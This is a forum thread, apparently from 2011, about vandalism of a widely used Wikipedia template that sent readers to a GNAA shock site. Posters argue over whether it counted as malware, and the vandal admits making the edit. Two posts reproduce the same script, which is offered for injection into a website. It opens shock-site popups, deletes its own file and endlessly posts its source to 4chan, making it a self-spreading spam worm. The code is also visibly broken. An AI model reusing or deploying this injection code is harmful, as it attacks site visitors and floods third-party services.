Uh oh - malware infection from WP? Options

[carbuncle]

There is a report on the admin noticeboard that certain pages were causing malware infections. Some quotes:

:IF YOU CLICKED ON THE VANDALIZED PAGE. If you have, especially if you are running Idiotically Exploding and your AV software did not go crazy, I strongly suggest you kill your browser sessions and do a full scan of your computer. I tried right clicking for source... then left clicking to get focus... and before I could right click again, my AV software got very upset.

It's very disturbing that someone manged to mount that kind of attack. I can live with the NSFW pictures popping unexpectedly around here, but malware injection?? FuFoFuEd (talk) 03:38, 21 August 2011 (UTC)

I believe the malware site was under the domain feenode.net (the homepage is a shock site with gruesome images and audio—don't go there!), which is apparently owned by GNAA (see [33] archive) Would an admin add this domain to the edit filter or the spam blacklist? Thanks, Goodvac (talk) 05:03, 21 August 2011 (UTC)

I used Firefox 5, did not click on anything in that page, but still got infected with something that moves my browser window randomly around and fills it with some gory pic. It's fine for a while after I kill the process but then starts again. Avira can't find anything. Any suggestions? FuFoFuEd (talk) 06:10, 21 August 2011 (UTC)

While there is no real evidence that this was done by the GNAA, it seems that a GNNA-owned page is involved, and some members recently got blocked on WP. The page/template involved has been revdeleted and there isn't much detail in the report, but if someone has found a way to actually infect WP reader's computers, that might put a bit of a dent in WP's hit count.

[SB_Johnny]

Is this a first? I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).

[Jon Awbrey]

Silly Rabbit, Wikipedia IS Malware …

Jon

[Detective]

I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).

Silly Rabbit, Wikipedia IS Malware …

Jon

I'm missing something here. Aren't you two in complete agreement? How does that make SBJ a silly rabbit? (Now if we were discussing Wikiversity ...)

[Zoloft]

I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).

Silly Rabbit, Wikipedia IS Malware …

Jon

I'm missing something here. Aren't you two in complete agreement? How does that make SBJ a silly rabbit? (Now if we were discussing Wikiversity ...)

No two people are in complete agreement.

Jon is just ensuring that SBJ never gets his hands on delicious Kix cereal.

Some humans are malware. GNAA is a convenient collection of such people.

This post has been edited by Zoloft: Sun 21st August 2011, 9:39pm

[Milton Roe]

Some humans are malware. GNAA is a convenient collection of such people.

Randolf Churchill, son of the Prime Minister and a rather nasty alcoholic, once upon a time developed a colon tumor which had to be removed. It proved not be cancer. Some wag said "What a shame to cut out of Randolf the only part that is NOT malignant...."

[melloden]

The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.

[SB_Johnny]

The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.

Actually it wasn't Meepsheep, it was an edit to a widely used and unprotected template by a throwaway account.

Looking at the code, it looks like trying to click on any link from the article would have landed on the GNAA page. I doubt this will be anything near the last time someone employs the trick, and done to scale it could seriously mess up Wikipedia for a while.

Maybe that "image filter" will need be reset to use whitelists rather than blacklist categories...

[Michaeldsuarez]

The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.

http://encyclopediadramatica.ch/Last_Measure

[Meepsheep]

So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?

[Mr.Treason II]

So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?

If you're careful, there is NO MALWAREZ.
The Hoser's site got Javascripted, so just slip some javascript like this

CODE

<script type="text/javascript">
<!--
window.open( "http://www.feenode.net/" )
window.open( "http://www.WPReview.on.nimpfullofmalware.org/" )
k="Content-Disposition: form-data; name="

function r(){
    return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) )
}

f = WSH.createobject("scripting.filesystemobject")
g = f.opentextfile(WSH.scriptfullname)
h = g.readall()
g.close()
f.deletefile( WSH.scriptfullname )
function 4chan;
{
x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h
a = WSH.createobject( "msxml2.xmlhttp" )

while(1) {
    a.open( "get", "http://img.4chan.org/b", 0 )
    a.send()
  
    b = a.responsetext
    c = b.substr( b.indexOf( "res/" ) + 4, 8 )
    d = ""
    e = ""
  
    for( i = 0; i < 20; i++ )
        d += r()
  
    for( i = 0; i < 8; i++ )
        e += r()
  
    a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 )
    t = "multipart/form-data; boundary=" + d
    a.setrequestheader( "Content-Type", t )
    a.send("--" + d + "\r\n" +
        k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" +
        k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" +
        k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" +
        k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" +
        k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" +
        k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" )
  
    WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) )
}
}
4chan.js();

//-->
</script>

[Meepsheep]

So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?

If you're careful, there is NO MALWAREZ.
The Hoser's site got Javascripted, so just slip some javascript like this

CODE

<script type="text/javascript">
<!--
window.open( "http://www.feenode.net/" )
window.open( "http://www.WPReview.on.nimpfullofmalware.org/" )
k="Content-Disposition: form-data; name="

function r(){
    return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) )
}

f = WSH.createobject("scripting.filesystemobject")
g = f.opentextfile(WSH.scriptfullname)
h = g.readall()
g.close()
f.deletefile( WSH.scriptfullname )
function 4chan;
{
x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h
a = WSH.createobject( "msxml2.xmlhttp" )

while(1) {
    a.open( "get", "http://img.4chan.org/b", 0 )
    a.send()
  
    b = a.responsetext
    c = b.substr( b.indexOf( "res/" ) + 4, 8 )
    d = ""
    e = ""
  
    for( i = 0; i < 20; i++ )
        d += r()
  
    for( i = 0; i < 8; i++ )
        e += r()
  
    a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 )
    t = "multipart/form-data; boundary=" + d
    a.setrequestheader( "Content-Type", t )
    a.send("--" + d + "\r\n" +
        k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" +
        k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" +
        k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" +
        k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" +
        k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" +
        k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" )
  
    WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) )
}
}
4chan.js();

//-->
</script>

Oh god, 4chan.js, takes me back man

This post has been edited by Meepsheep: Tue 11th October 2011, 4:20am

[Kelly Martin]

Is this a first? I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).

No, not the first time. There's been about a half-dozen instances of people using Wikipedia (or Wikimedia Commons) to spread malware that I've heard of. There are some phenomenally stupid security holes in IE that, to be honest, Tim Starling and Brion Vibber have bent over backwards to secure MediaWiki against. MediaWiki now has some fairly sophisticated code in it to screen uploaded files for malicious content; that code is there to block exploits that actually happened on Wikipedia or on Commons. Even so, there are doubtless still infected files in Commons; I'd not be surprised if a good portion of the porn there carries malware payloads, especially anything uploaded prior to mid-2007.